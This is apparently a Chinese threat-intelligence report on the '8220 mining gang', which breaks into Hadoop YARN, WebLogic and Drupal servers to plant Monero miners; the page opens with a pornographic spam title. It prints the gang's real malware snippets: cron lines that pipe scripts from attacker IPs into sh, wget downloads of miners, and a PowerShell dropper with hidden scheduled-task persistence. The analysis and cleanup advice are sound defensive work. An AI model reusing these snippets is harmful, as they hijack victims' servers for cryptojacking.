压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

背景

當今互聯網的高速發展，孕育出了一批高新產業，如人工智能、分布式計算、區塊鏈、無人駕駛等。這些高新技術為人們生活帶來便利的同時，引發的安全問題也日益凸顯。隨著區塊鏈技術的普及，其涉及的虛擬數字貨幣也創造了巨大的財富。這些虛擬貨幣可以通過“挖礦”的形式獲取，“礦工”越多，利益越大。因此，近年來有越來越多的黑客團伙通過非法入侵控制互聯網上的計算機并植入木馬程序偷偷進行挖礦活動，為自己謀取暴利。

而在近期，360威脅情報中心根據某高校客戶的反饋捕獲到一批新的針對Linux平臺的挖礦木馬，而通過溯源關聯分析發現這只是一個疑似國內來源的專業黑客團伙長期活動中的一部分。360威脅情報中心監測到該團伙在過去的一年非常活躍，使用了多個漏洞對網絡中的服務器進行攻擊：例如使用了WebLogic XMLDecoder反序列化漏洞、Drupal的遠程任意代碼執行漏洞、JBosss反序列化命令執行漏洞、Couchdb的組合漏洞、Redis、Hadoop未授權訪問漏洞等入侵互聯網中的服務器并植入挖礦木馬長期獲利。在一系列的攻擊活動中，我們發現該團伙的C2服務器統一使用8220號端口，因此360威脅情報中心將該團伙命名為“8220挖礦團伙”，并在后續的分析中以此代號對該團伙進行相關分析。

來源

近日，360威脅情報中心接到某高校客戶反饋：最近幾臺用做分布式計算的服務器出現機器不穩定、卡頓、服務響應不及時等現象，他們通過對系統性能的檢查，發現CPU利用率高達700%，這使得他們感到疑惑。360威脅情報中心協助用戶對此事件進行了跟進分析，發現這是一起攻擊者利用Hadoop Yarn資源管理系統REST API未授權漏洞對服務器進行攻擊并植入了最新的門羅幣挖礦木馬進行挖礦的安全事件。

問題排查

在獲得客戶同意后，360威脅情報中心研究人員對存在問題的Linux服務器進行了遠程排查，發現攻擊者是通過未打補丁的Hadoop Yarn資源管理系統入侵服務器的。進一步排查后獲取到一個最新的Linux挖礦木馬，排查過程如下。（懷疑自己中了同類挖礦木馬的用戶，可以使用如下命令進行自檢，清理方案詳見安全建議一節。）

• 首先執行$ top命令，檢查系統運行狀態，此臺Linux服務器的CPU利用率為732%

• 再執行$ ps aux | grep [pid]命令，定位到可疑的挖礦木馬文件，位于/var/tmp/目錄下

• 繼續執行$ hadoop version命令，檢查Hadoop版本，當前Linux服務器上安裝的Hadoop版本號為2.6.0（此版本支持認證服務，但若未開啟，攻擊者則可通過Hadoop Yarn資源管理系統REST API未授權漏洞入侵系統）

• 執行$ crontab -u yarn -l命令，檢查任務計劃，yarn用戶每分鐘向C2地址發起請求，獲取最新腳本文件

• 執行$ head /var/log/cron-20180617命令（實際操作中需要查看對應的日志文件），檢查任務計劃日志，發現挖礦木馬在6月10日替換過C2地址

通過上述操作，我們定位到了此次事件中的門羅幣挖礦木馬程序和核心控制腳本，并進行了詳細分析，分析情況見樣本分析一節。

攻擊植入過程分析

通過對其中某臺服務器檢查，360威脅情報中心初步判定攻擊者利用了Hadoop Yarn REST API未授權漏洞入侵了這些服務器，從而植入挖礦木馬實現獲利：

360威脅情報中心分析了整個攻擊植入流程如下：

樣本分析

相關樣本

我們將此次事件中挖礦木馬的核心文件以列表的形式整理如下，并逐一進行分析：

樣本分析–cr.sh核心腳本

攻擊者利用YARN默認開放的8088端口服務，向服務器提交惡意作業，該作業包含遠程下載并執行Shell腳本的命令。下載回來的腳本cr.sh完成如下功能：

1. 清理主機環境：停止、刪除主機已經存在的其他挖礦程序
2. 檢查主機環境：檢查指定的挖礦程序是否已經存在
3. 配置主機環境：下載挖礦程序和配置文件并執行
4. 持續感染主機：設置任務計劃，保持更新，持續感染主機
5. 清理任務計劃：清除其他挖礦相關的任務計劃

清理主機環境代碼片段：結束當前主機正在運行的其他已知挖礦程序并刪除，已知挖礦程序的文件名如pscf、ntpd、ntp、qq、qq1等：

...
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
rm -rf /var/tmp/pscf*
rm -rf /tmp/pscf*
pkill -f ririg
rm -rf /var/tmp/ntpd
pkill -f /var/tmp/ntpd
rm -rf /var/tmp/ntp
pkill -f /var/tmp/ntp
rm -rf /var/tmp/qq
rm -rf /var/tmp/qq1
pkill -f /var/tmp/qq
rm -rf /tmp/qq
rm -rf /tmp/qq1
pkill -f /tmp/qq
pkill -f /var/tmp/aa
rm -rf /var/tmp/aa
...

...
if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
??? downloadIfNeed
??? chmod +x $DIR/java
??? $WGET $DIR/w.conf https://raw.githubusercontent.com/ffazop1/mygit/master/w.conf
??? nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
??? sleep 5
??? rm -rf $DIR/w.conf
else
??? echo "Running"
fi
...

...
if crontab -l | grep -q "46.249.38.186"
then
??? echo "Cron exists"
else
??? echo "Cron not found"
??? LDR="wget -q -O -"
??? if [ -s /usr/bin/curl ];
??? then
??????? LDR="curl";
??? fi
??? if [ -s /usr/bin/wget ];
??? then
??????? LDR="wget -q -O -";
??? fi
??? (crontab -l 2>/dev/null; echo "* * * * * $LDR http://46.249.38.186/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
?
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/45.77.86.208/d' | crontab -
...

cr.sh腳本中內置了兩個挖礦程序的MD5，如果當前主機中的挖礦程序MD5不在這兩個MD5中，則cr.sh會從指定的服務器上下載對應的挖礦程序。

通過360威脅情報中心大數據分析平臺，我們獲取到這兩個MD5對應對文件。經過簡單分析，這兩個文件分別為Linux下的32位和64位挖礦程序，并且都是基于XMRig[2]開源挖礦工具修改的。挖礦程序支持如下命令：

32位挖礦程序基于XMRig2.5.2版本修改，2016年編譯生成，程序中內置1個錢包地址：48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD，屬于開源挖礦軟件作者，用于抽水。

64位挖礦程序基于XMRig2.6.2修改，2017年編譯生成，程序中內置兩個錢包地址，一個屬于開源軟件作者，另一個錢包地址：46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S，則可定位到開源項目cpuhunter[3]。

樣本分析–w.conf配置文件

cr.sh腳本同時會從指定的服務器上下載挖礦配置文件，作為參數傳遞給挖礦程序，并在挖礦開始后刪除該配置文件，保證隱私性。我們通過配置文件中的錢包地址和礦池地址信息關聯到了“8220挖礦團伙”大量利用服務器漏洞進行入侵挖礦的攻擊事件，詳見溯源與關聯一節。

C2信息

本次事件中，攻擊者使用了Github作為云分發平臺，保存挖礦程序和配置文件。360威脅情報中心數據平臺顯示，該攻擊者會不定期的創建刪除Github賬號，保證可用性及隱私性。

已使用的Github賬戶名（均已刪除）：

• ffazop1
• zzgamond1

Github項目地址（均已刪除）：

• https://raw.githubusercontent.com/ffazop1/mygit/master/w.conf
• https://raw.githubusercontent.com/ffazop1/mygit/master/x_64
• https://raw.githubusercontent.com/zzgamond1/mygit/master/w.conf
• https://raw.githubusercontent.com/zzgamond1/mygit/master/x_64

溯源與關聯

使用360威脅情報中心數據分析平臺對此次事件中出現的文件、IP地址、端口、關鍵字、錢包地址、MD5等進行關聯分析，我們跟蹤到一個疑似國內來源的挖礦黑客團伙，在該團伙所有的挖礦攻擊活動中都擁有以下共同特點，使得360威脅情報中心將這些挖礦攻擊事件全部關聯到同一伙人身上：

端口關聯

在多起事件中，出現的C2服務器統一使用8220號端口，因此我們可將其作為身份識別的一個弱特征。

文件名關聯

在多起事件中，重復使用了相同的文件名，例如1.ps1、2.ps1、logo0.jpg、logo2.jpg、logo3.jpg、logo4.jpg、logo7.jpg等，因此我們也將其作為身份識別的一個弱特征。

錢包地址關聯

從同一個C2上，我們獲取到該團伙不同時期使用的兩個腳本，這兩個腳本包含了兩個不同的門羅幣錢包地址，并且這兩個錢包地址在這些事件中都有使用。考慮錢包的私有特性，我們可將其作為身份識別的一個強特征。

且通過大數據分析顯示，該團伙已經存在很長時間，并且在過去一年中異常活躍，在幾起曝光的嚴重漏洞攻擊事件中，都有該團伙的身影。另外從關聯的信息中，我們發現該團伙的挖礦活動涉及Linux和Windows平臺。種種跡象表明，該團伙不斷在積累自身的網絡攻擊武器庫，以支撐他們對網絡中存在漏洞的主機進行自動化的攻擊，最終拿下主機并實現挖礦的目的。

并且360威脅情報中心推測該團伙是利用Docker進行C2服務器自動化部署工作，導致這些C2統一使用8220號端口與木馬進行通信。因此360威脅情報中心將該團伙命名為“8220挖礦團伙”：

運行在C2服務器8220端口上的Apache服務

攻擊活動時間線

通過對關聯信息的整理歸納，我們繪制了過去一年與該團伙相關的攻擊活動的時間圖：

活動圖中的時間順序僅為我們發現該團伙最早的活動時間，并不表示該團伙只在此時間段利用此漏洞。相應的，此圖直觀體現了該團伙積累了較多的網絡攻擊武器。我們有理由相信，還有大量關于該團伙的未被曝光的攻擊事件。

攻擊手法

360威脅情報中心將溯源關聯到的“8220挖礦團伙”近年來所有的攻擊事件和攻擊手法逐一進行分析。我們詳細介紹其中的兩類漏洞利用相關的攻擊事件，其他的以列表的形式整理在后文。

WebLogic漏洞攻擊事件（清理同類挖礦木馬保證一家獨大）

通過360威脅情報中心數據平臺，我們發現了一起利用WebLogic漏洞進行入侵服務器并進行挖礦的攻擊活動。在此活動中，攻擊者使用了相同的錢包地址，因此我們也將其確定為“8220挖礦團伙”所為。

攻擊者利用WebLogic XMLDecoder反序列化漏洞（編號CVE-2017-10271[4]）攻擊服務器，并獲取服務器控制權限，進而植入挖礦木馬進行挖礦。該漏洞出現在WebLogic Server Security Service中，影響WebLogic Server 12.2.1.2.0及其之前的版本。利用此漏洞，攻擊者下載名為2.ps1的PowerShell腳本并執行。腳本進而會下載挖礦木馬程序，進行挖礦活動。同時，該腳本也會終止其他挖礦程序運行，保證自己獨占CPU資源。

PowerShell腳本會從192.99.142.232:8220服務器下載xmrig.exe挖礦程序，以yam.exe的文件名保存在本地，通過cmd.exe啟動挖礦程序，同時傳入礦池地址，錢包地址，密碼信息：

$ne = $MyInvocation.MyCommand.Path
$nurl = "http://192.99.142.232:8220/xmrig.exe"
$noutput = "$env:TMP\yam.exe"
$vc = New-Object System.Net.WebClient
$vc.DownloadFile($nurl,$noutput)
copy $ne $HOME\SchTask.ps1
copy $env:TMP\yam.exe $env:TMP\pe.exe
?
SchTasks.exe /Create /SC MINUTE /TN "Update service for Oracle productsa" /TR "PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noexit -File 
...
cmd.exe /C taskkill /IM 360rps.exe /f
cmd.exe /C $env:TMP\pe.exe --donate-level=1 -k -a cryptonight -o stratum+tcp://monerohash.com:5555 -u 41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo -p x

通過對C2地址的深度挖掘，我們發現一篇今年4月國外安全廠商發布的報告[5]。報告中提到了兩種利用Drupal遠程任意代碼執行漏洞（編號CVE-2018-7600[6]）的挖礦木馬程序，通過錢包地址的關聯，確定其中一種挖礦木馬也是“8220挖礦團伙”所擁有。

而Drupal的遠程任意代碼執行漏洞是由于Drupal對表單的渲染引起的。為了能夠在表單渲染對過程中動態修改數據，Drupal引入了“Drupal Render API”機制[7]，“Drupal Render API”對于#會進行特殊處理，其中#pre_render在render之前操作數組，#post_render接收render的結果并在其添加包裝，#lazy_builder用于在render過程的最后添加元素。由于對于部分#屬性數組值，Drupal會通過call_user_func的方式進行處理，導致任意代碼執行。漏洞驗證POC[8]，利用此POC可快速驗證Drupal是否存在該漏洞。

“8220挖礦團伙”利用此漏洞下載并執行挖礦程序。其中的Shell惡意腳本代碼將wget -q http://192.99.142.235:8220/logo4.jpg -O – | sh命令寫入任務計劃，實現對服務器的持續感染。同時從192.99.142.235:8220下載配置文件3.json和挖礦程序rig，分別保存為config.json和sustes，最后利用nohup命令在后臺運行挖礦。

...
crontab -r || true && \
echo "* * * * * wget -q http://192.99.142.235:8220/logo4.jpg -O - | sh" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
wget -O /var/tmp/config.json http://192.99.142.235:8220/3.json
wget -O /var/tmp/sustes http://192.99.142.235:8220/rig
chmod 777 /var/tmp/sustes
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$((($proc+1)/2))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./sustes -c config.json -t `echo $cores` >/dev/null &
...

Docker鏡像利用

360威脅情報中心還發現國外一篇關于Docker Hub鏡像的安全研究報告[12]中，疑似出現“8220挖礦團伙”的身影。報告指出，從2017年05月注冊賬號開始，到2018年05月刪除賬號結束，該賬號陸續上傳了17個惡意docker鏡像，鏡像下載量達到500萬次以上。這些鏡像的功能大致可分為如下四類：

1. 反彈主機的SHELL
2. 向主機中添加SSH公鑰
3. 在主機中添加任務計劃
4. 利用鏡像完成挖礦

通過對報告中出現的錢包信息，C2信息等，結合360威脅情報中心數據平臺關聯的同一時間段信息，我們確定此賬號為“8220挖礦團伙”所擁有。更加證實了我們關于這是一支專業挖礦團伙的判定。

“8220挖礦團伙”挖礦信息統計

360威脅情報中心統計了“8220挖礦團伙”近年來所有攻擊活動中常用的錢包信息、收益狀況等如下。

錢包信息

錢包1

• 錢包地址：

41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo

• Monerohash上的有效期：? — 2018/5/08
• 總收益：90.1934XMR（僅Monerohash公開礦池）
• 交易記錄截圖

錢包2

• 錢包地址：

4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg

• Monerohash上的有效期：2018/5/15 — 今
• 總收益：140.3400XMR（僅Monerohash公開礦池）
• 交易記錄截圖

收益匯總及評估

僅看Monerohash公開礦池的交易記錄，“8220挖礦團伙”累計獲取超過230枚門羅幣。其中，錢包2提供的算力高達365KH/sec，占Monerohash礦池算力的7%左右。做個簡單估算，以INTEL CORE I5-2400處理器作為參考，核心全開的情況下算力大約在70H/sec左右，那么相當于大約有5200臺服務器在同一時間為該團伙進行挖礦。

通過查詢其他相關公開礦池的交易記錄，此團伙累計獲取超過1000枚門羅幣，按照市價974元/枚計算，其價值將近100萬元人民幣。考慮還有未統計的公開礦池及無法查詢的私有礦池，保守估計該團伙累計獲益已達數百萬。

錢包信息關聯

從以上交易截圖中可觀察出，“8220挖礦團伙”前期使用的錢包1在今年4月時，被安全廠商標注為Botnet，各大公開礦池也將其列入黑名單，禁止接入挖礦。此后，該團伙使用了另一個錢包2，在大型礦池挖礦，并持續至今。

攻擊者畫像-疑似國內團伙

我們對涉及的樣本做了簡單的統計如下：

配置文件使用過的名稱：

• w.conf、dd1.conf、gg1.conf、test.conf、tes.conf、hh1.conf
• kkk1.conf、ttt1.conf、ooo1.conf、ppp1.conf

挖礦程序使用過的名稱：

• nginx、suppoie、java、mysql、cpu.c、ntpd、psping、java-c、pscf、
• cryptonight、sustes、xmr-stak、ririg、ntp、qq、aa、ubyx
• logo4.jpg、logo0.jpg、logo9.jpg
• apaqi、dajiba、look、orgfs、crant、jvs、javs

通過對相關樣本的統計分析，結合其具有中文特色命名的特點、交易發生的時間（統計分析主要集中在UTC+8時區）及其他一些信息，我們懷疑這是一支來源于國內的挖礦團伙。360威脅情報中心后續將繼續跟進該團伙，采集更多信息對其進行全方位網絡畫像。

總結及安全建議

針對此次高校服務器挖礦事件中出現的惡意樣本，360威脅情報中心建議用戶使用如下步驟檢測及清理疑似中招的服務器：

1. 使用top查看進程，KILL掉異常進程
2. 檢查/var/tmp目錄，刪除java、pscf3、w.conf等異常文件
3. 檢查crontab任務列表，刪除異常任務
4. 檢查YARN日志，刪除異常的Application ID
5. 開啟Hadoop Kerberos認證服務

而對于日益嚴重的入侵網絡服務器植入挖礦木馬的攻擊事件（現階段幾乎是黑客團伙最喜歡的攻擊獲利方式之一），360威脅情報中心建議企業客戶盡量做好以下防范措施：

• 定期對服務器進行加固，盡早修復服務器相關安全漏洞，如有條件務必安裝服務器端的安全軟件
• 當發現主機存在挖礦木馬時，務必立即進行全方位的檢查，必要時請聯系專業的安全公司進行協助處理
• 關注360威脅情報中心更新的最新安全通告，對相應的安全威脅及時進行排查

目前，基于360威脅情報中心的威脅情報數據的全線產品，包括360威脅情報平臺（TIP）、天眼高級威脅檢測系統、360 NGSOC等，都已經支持對此挖礦團伙攻擊活動的實時檢測和相關未知攻擊的預警。

IOC

礦池地址及C2

相關樣本

參考

[1].https://groups.google.com/a/dcos.io/d/topic/users/NF4wMQ2VrJ8

[2].https://github.com/xmrig/xmrig

[3].https://github.com/lukacci/cpuhunter

[4].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

[5].https://www.blueliv.com/blog-news/research/drupalgeddon2-sa-core-2018-002-cve-2018-7600/

[6].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600

[7].https://cert.360.cn/report/detail?id=c92cfff2634a44c8b1d6bd5e64c07f3d

[8].https://github.com/a2u/CVE-2018-7600

[9].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12149

[10].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12635

[11].http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12636

[12].https://kromtech.com/blog/security-center/cryptojacking-invades-cloud-how-modern-containerization-trend-is-exploited-by-attackers

[13].https://www.reddit.com/r/MoneroMining/comments/7nv8h6/xmrig_hackers/

[14].https://blog.csdn.net/Dancen/article/details/75313424

[15].https://www.cnblogs.com/birdstudio/p/7650622.html

[16].https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html

原文：https://www.anquanke.com/post/id/154381